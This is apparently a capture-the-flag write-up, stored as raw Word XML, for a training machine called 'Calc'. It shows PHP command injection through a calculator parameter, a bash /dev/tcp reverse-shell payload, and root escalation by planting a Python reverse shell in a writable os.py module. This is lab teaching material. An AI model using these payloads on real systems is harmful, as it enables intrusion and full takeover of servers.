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CALC</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uxyaunix3n00"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2n98dsbdeo3r"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4000500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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bjg4l23hr7ku"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22 – SSH</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 80 – HTTP</w:t>
        <w:br w:type="textWrapping"/>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111 – RPCBIND</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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660900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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have a web page with an online calculator where we can perform mathematical operations.</w:t>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67200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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use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to intercept the request so I can see what is happening “behind the scenes.”</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08300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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31omia8m8cie" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection</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verified that it is sending a POST request using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">calc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 to perform the operations. Apparently, it must be using some PHP function to do this, for example the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function in PHP. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eval()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function executes a variable that can modify the code contained in PHP.</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we can attempt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since we control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calc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. For this, I will use backticks, because PHP supports an execution operator: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backticks (</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Note that these are not single quotes! PHP will attempt to execute the content inside backticks as a shell command, identical to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell_exec()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function.</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pass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to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">calc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parameter.</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5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now have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE on the server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The next step is to obtain a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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/dev/tcp/ip-vpn/443 0&gt;&amp;1'</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to listen on a port to receive our reverse connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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6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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we send our payload. Do not forget to URL-encode the payload. In Burp Suite, you can select the part you want to encode using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+U</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payload will look like this:</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/bin/bash+-c+'sh+-i+&gt;%26+/dev/tcp/ip-vpn/443+0&gt;%261'</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24200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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it, we receive the connection 😃</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zi9v48somd7b" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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t1glgd8wyakv" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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73"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a5xwd216f6ml" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessing the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can obtain the first flag.</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beg9391sktrw" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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1016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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c7nxcgq51ghy" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Flag</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home directory of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have the user flag, but we do not have read permission because we are running as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">apache</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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01900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bash_history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Reading the file, I see a hash (password). We can try to use it to log in as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, and by doing so, we successfully log into the account.</w:t>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2"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read the user flag =)</w:t>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5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4lg422ksjxe3" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>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3B">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xlnwb7sy1gek" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Library Hijacking</w:t>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see… What happens if a Python script is executed with sudo privileges, but you have write permissions on the imported module.</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execute the script</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> calc.py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with root privileges.</w:t>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0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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read the content of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">calc.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but we do not have write permission.</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see that it is importing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os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library.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the host, I see that we have write permissions on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library.</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abuse this by writing a reverse shell into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library. That way, when we run the script with root privileges and it imports the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library, we will obtain a shell as the root user.</w:t>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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.py</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and add our reverse shell at the end of the file:</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import socket,subprocess,os;</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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</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s.connect(("ip-vpn",4444));</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os.dup2(s.fileno(),0);</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os.dup2(s.fileno(),1);</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os.dup2(s.fileno(),2);</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p=subprocess.call(["/bin/sh","-i"]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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84500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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listening to receive the reverse connection:</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67"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 the script:</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95500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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thus obtaining the final flag.</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68"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8">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="15"/>
    <w:bookmarkEnd w:id="1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1" name="image3.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.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59">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5A">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2.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2.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Calc</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23.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1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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app.hackingclub.com/training/training-machines/26"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5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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image" Target="media/image22.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8Xi26iSs+zV0dyuFx6Bgs03Hmw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnV4eWF1bml4M24wMDIOaC4ybjk4ZHNiZGVvM3IyDmguYmpnNGwyM2hyN2t1Mg5oLjMxb21pYThtOGNpZTIOaC56aTl2NDhzb21kN2IyDmgudDFnbGdkOHd5YWt2Mg5oLmE1eHdkMjE2ZjZtbDIOaC5iZWc5Mzkxc2t0cncyDmguYzdueGNncTUxZ2h5Mg5oLjRsZzQyMmtzanhlMzIOaC54bG53YjdzeTFnZWsyDmguMTc1ZjVjczk0ejBvOAByITFjbFNHNzVyWGk4ZWgzYVhXaWlzam1zNHNsY092QzdX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